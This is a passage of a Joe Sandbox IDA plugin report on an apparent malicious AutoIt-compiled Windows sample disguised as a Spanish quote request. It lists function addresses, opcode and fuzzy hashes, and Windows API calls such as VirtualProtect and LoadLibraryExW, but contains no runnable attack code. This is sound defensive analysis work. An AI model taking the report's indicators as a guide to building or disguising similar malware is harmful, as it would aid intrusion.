Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 8f20eb4329a10882ca0429f8149fe132555cc55f849a05b68bf32a1a12202289
Instruction ID: f157ad32bed1a4035642ae6364efa048bb86cb2a7340fad2bdca2cd61c0af1d9
Opcode Fuzzy Hash: 8f20eb4329a10882ca0429f8149fe132555cc55f849a05b68bf32a1a12202289
Instruction Fuzzy Hash: EE22BD706283029FC714CF14C484A6ABBF1BFA5304F64895DF9968B3A1D772E8A5CF42

Function 00276EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00276F6B

Part of subcall function 00204ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204EFD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00276F5A, 00276F63

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: LibraryLoad_wcslen
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 3312870042-2806939583
Opcode ID: 51303f1f7b4658a51707261794da8d21e277449f8df6b31f987a761bdce14b91
Instruction ID: cc7834eafaca019854a6f7a774433af676076b7a949343dc07eb4aaabf2437d4
Opcode Fuzzy Hash: 51303f1f7b4658a51707261794da8d21e277449f8df6b31f987a761bdce14b91
Instruction Fuzzy Hash: 32B174715283018FCB14EF24C89196EB7E5AF94300F54895DF89A972A3DB30ED69CF92

Function 00272557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00272587

Strings

EA06, xrefs: 002725B9

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: __fread_nolock
String ID: EA06
API String ID: 2638373210-3962188686
Opcode ID: 3fe5da63ad0addc8b5c4d6e9058e19cb89efbb04f43f9b3a180e99e984b2e95d
Instruction ID: 5f1a29c22845bd6b033f963d18f426ea7ddd7b4902f37a2221d2981b5d689888
Opcode Fuzzy Hash: 3fe5da63ad0addc8b5c4d6e9058e19cb89efbb04f43f9b3a180e99e984b2e95d
Instruction Fuzzy Hash: F701B572914268BEDF28C7A8C856EAEBBF89F15311F00455AE192D2181E5B4E6188B60

Function 01785398 Relevance: 1.7, APIs: 1, Instructions: 167COMMON

Download Yara Rule

APIs

Part of subcall function 01784C08: GetFileAttributesW.KERNELBASE(?), ref: 01784C13

CreateDirectoryW.KERNELBASE(?,00000000), ref: 017854F4

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AttributesCreateDirectoryFile
String ID:
API String ID: 3401506121-0
Opcode ID: 4e677bd7d922cd662bd9c42af54a40d4401081082bd46ec3844ee37e616e9a3c
Instruction ID: fa78c70f87c15452514ace2aac094f13231b349a72ef6453f96ee9ca379a158f
Opcode Fuzzy Hash: 4e677bd7d922cd662bd9c42af54a40d4401081082bd46ec3844ee37e616e9a3c
Instruction Fuzzy Hash: 79519131A1020996EF14EFA0D854BEFB37AFF58300F10456DE60DEB290EB759A45CBA5

Function 0021FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 0021FD1F

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 10d55f2fb769c40f22c6d86c162d3687941247eb9d8a72b6862e937d9ace1170
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 10311874A1010ADBC758CF59E6809A9F7E1FF69300B2482A6E81ACF651D731EDE1DBC0

Function 00204ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00204E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00204EDD,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204E9C
Part of subcall function 00204E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00204EAE
Part of subcall function 00204E90: FreeLibrary.KERNEL32(00000000,?,?,00204EDD,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204EC0

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204EFD

Part of subcall function 00204E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00243CDE,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204E62
Part of subcall function 00204E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00204E74
Part of subcall function 00204E59: FreeLibrary.KERNEL32(00000000,?,?,00243CDE,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204E87

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: d8344101d5af2e31edb2fe3f938d45e348f42210ba37ae6b63b8a554fea3d280
Instruction ID: fe1fbf338bc439fe3193e8c34ea2fe7accdbcd4d63f17d8285719747a9f68557
Opcode Fuzzy Hash: d8344101d5af2e31edb2fe3f938d45e348f42210ba37ae6b63b8a554fea3d280
Instruction Fuzzy Hash: 58110471630306AACF14FF60DC46BAD77A59F40715F20842EF642A61C2DEB49A249F50

Function 00238402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00238440

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 7d1ea554090d43e850c88e0e2753520523b0111ddba6ae3f3ad7894c0b9b37cb
Instruction ID: 7db056eb6794f82da8ffb6a77147c61969770f1f1a816acd14ac1ae3b33db412
Opcode Fuzzy Hash: 7d1ea554090d43e850c88e0e2753520523b0111ddba6ae3f3ad7894c0b9b37cb
Instruction Fuzzy Hash: C31118B591420AAFCF15DF58E94199A7BF5EF48314F104059F908AB312DB31EA21CBA5

Function 00235000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00234C7D: RtlAllocateHeap.NTDLL(00000008,00201129,00000000,?,00232E29,00000001,00000364,?,?,?,0022F2DE,00233863,002D1444,?,0021FDF5,?), ref: 00234CBE

_free.LIBCMT ref: 0023506C

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction ID: e0072f3ef053dede176f56f52f2d75d3c9bf4bb50b3ca636c63331bd82c23a40
Opcode Fuzzy Hash: 70ee4adefee6eb26262b39f529bfb094e1f6354ac2554c6942b38d017f4a210d
Instruction Fuzzy Hash: 760149F2214715ABE335CF65D881A5AFBECFB89370F25051DE188832C0EA71A905CBB4

Function 0022E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction ID: ae3882fba8a16c76af1098a80d040220e23d087ad03a24a866eb9356d4d1d3c0
Opcode Fuzzy Hash: 4bdb02cb5d44b5d694786f455fb1b19b1376b5bca3dd6da9f9dc09084e2e4678
Instruction Fuzzy Hash: ECF0F472530A34F6DA313EA9AC05B6A339C9F52331F110725F920961D2DBB4A8259EA5

Function 00234C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00201129,00000000,?,00232E29,00000001,00000364,?,?,?,0022F2DE,00233863,002D1444,?,0021FDF5,?), ref: 00234CBE

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f75465f3791b294c81e97ee91907f14dd28aca2c08e34f5563d6f4c07f4569fb
Instruction ID: ecef870158bdf84b7a41f03e98fd0bb5a2b531a80ba0d60babd77e19febfeb48
Opcode Fuzzy Hash: f75465f3791b294c81e97ee91907f14dd28aca2c08e34f5563d6f4c07f4569fb
Instruction Fuzzy Hash: CFF0247163223176DB203FA2AC08B5A3788AF413A0F1459A3B809A61A1CA70FC3146A0

Function 00233820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,002D1444,?,0021FDF5,?,?,0020A976,00000010,002D1440,002013FC,?,002013C6,?,00201129), ref: 00233852

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 537aa0aec451b5a9935bcaab485025f070edb6a40ff1c66666822310097b3c04
Instruction ID: d9c1643096608bc7bb40f8381f9d099a0314a8c15fd514db3e83554ca552af77
Opcode Fuzzy Hash: 537aa0aec451b5a9935bcaab485025f070edb6a40ff1c66666822310097b3c04
Instruction Fuzzy Hash: 19E0E572631236A6E6216EA6AC04B9A3749AF427B0F150132BC04928A0CB50DF2185E4

Function 00234D7A Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00234D9C

Part of subcall function 002329C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000), ref: 002329DE
Part of subcall function 002329C8: GetLastError.KERNEL32(00000000,?,0023D7D1,00000000,00000000,00000000,00000000,?,0023D7F8,00000000,00000007,00000000,?,0023DBF5,00000000,00000000), ref: 002329F0

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: ErrorFreeHeapLast_free
String ID:
API String ID: 1353095263-0
Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction ID: 1f706282e3551f58eb59d1eeb6b6b0ede76d5128a3053810c4381fb07321042b
Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
Instruction Fuzzy Hash: F0E092761103099F8720DF6CE400A82B7F4EF84320B208529E89DD3310D331F822CB80

Function 00204F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,002D1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00204F6D

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 37579206feaf9ac97ce917454045658130b3c8070976934eaf3f8e859b7c4872
Instruction ID: 2d40abbe2a1378e6fcee8b154590cdbb24066151b01a3d1bd9edc9f035588f22
Opcode Fuzzy Hash: 37579206feaf9ac97ce917454045658130b3c8070976934eaf3f8e859b7c4872
Instruction Fuzzy Hash: 4EF01CB1125753CFDB34AF64E498822B7E4AF14319320C96EE3DA82952C7719854DF10

Function 00202DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00202DC4

Part of subcall function 00206B57: _wcslen.LIBCMT ref: 00206B6A

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: f8244720df200c6c657f6c74a186e182122680619bde9c270efe906f62c51c71
Instruction ID: 7c1f832b085b0a0e9eb3479f924c460f08853bbe187d5a2a5cd3c229d90d5fd5
Opcode Fuzzy Hash: f8244720df200c6c657f6c74a186e182122680619bde9c270efe906f62c51c71
Instruction Fuzzy Hash: DEE0CD72A002245BC720D7589C09FDA77DDDFC8790F050071FD09E7249D960AD948950

Function 00272693 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 002726B5

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction ID: b20b592f03ee7cb03b81a1f0e59224edfa66d80bc5d290827fb460c57289c412
Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
Instruction Fuzzy Hash: 39E04FB061AB009FDF3D5E28A8517B677E89F49300F00486EF69F82252E57278958A4D

Function 00202B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00203837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00203908

Part of subcall function 0020D730: GetInputState.USER32 ref: 0020D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00202B6B

Part of subcall function 002030F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0020314E

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: 19db4b2208bb09cc71b16d8616e7297e81b8682cdea3edbc1614c066310b93fd
Instruction ID: 3fb91a48a9474533e66ea5a734c2209e24c0cf998b3b34f43b1ca0942a9963cc
Opcode Fuzzy Hash: 19db4b2208bb09cc71b16d8616e7297e81b8682cdea3edbc1614c066310b93fd
Instruction Fuzzy Hash: 1EE0262132030417C704FB70A85657DB34D8BD1311F00053FF142836E3CE2049794A11

Function 01784C08 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 01784C13

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 03d19884701594108bf6080885be3bad08f1f9c3f79cf08d9fe3b4ba01705b54
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 39E0C23098620DEBDB10EBBCCD04BADB3ECEB04320F004A95E907C32C0D6B08A00DB54

Function 01784BD8 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 01784BE3

Memory Dump Source

Source File: 00000000.00000002.2134171230.0000000001784000.00000040.00000020.00020000.00000000.sdmp, Offset: 01784000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1784000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: 9635ba20948e154faca3ad74357396d91e756a422defa91e831456975dc522f6
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 00D0A73094520DEBCB10DFBC9D08BDDBBE8E705360F008755FD1AC3280D67199009750

Function 0024039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00240704,?,?,00000000,?,00240704,00000000,0000000C), ref: 002403B7

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 78044742d53e06dfd84add41016d4880685865009ef6ca2bec8c8bdaa21260f1
Instruction ID: da7ebe3b912759a88846c7a8b590f85ca7d37b2e91784f86eab2b38e0fa55ba8
Opcode Fuzzy Hash: 78044742d53e06dfd84add41016d4880685865009ef6ca2bec8c8bdaa21260f1
Instruction Fuzzy Hash: 0BD06C3204010DBBDF028F84ED06EDA3BAAFB48714F114000BE1856020C732E821AB94

Function 00201CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00201CBC

Memory Dump Source

Source File: 00000000.00000002.2133278363.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true

Associated: 00000000.00000002.2133215691.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.000000000029C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133332073.00000000002C2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133458138.00000000002CC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2133476255.00000000002D4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_200000_Nuevo pedido de cotizaci#U00f3n 663837 4899272.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: 5596f8e02d39b58150911a0c866166a73979ff64f26e6ad2d3ff2ebbf7de2558
Instruction ID: 83c73bc3b50f6312f9a2379230ce82a2eacdf938060e0754e3a6ebaa1e72f3bd
Opcode Fuzzy Hash: 5596f8e02d39b58150911a0c866166a73979ff64f26e6ad2d3ff2ebbf7de2558
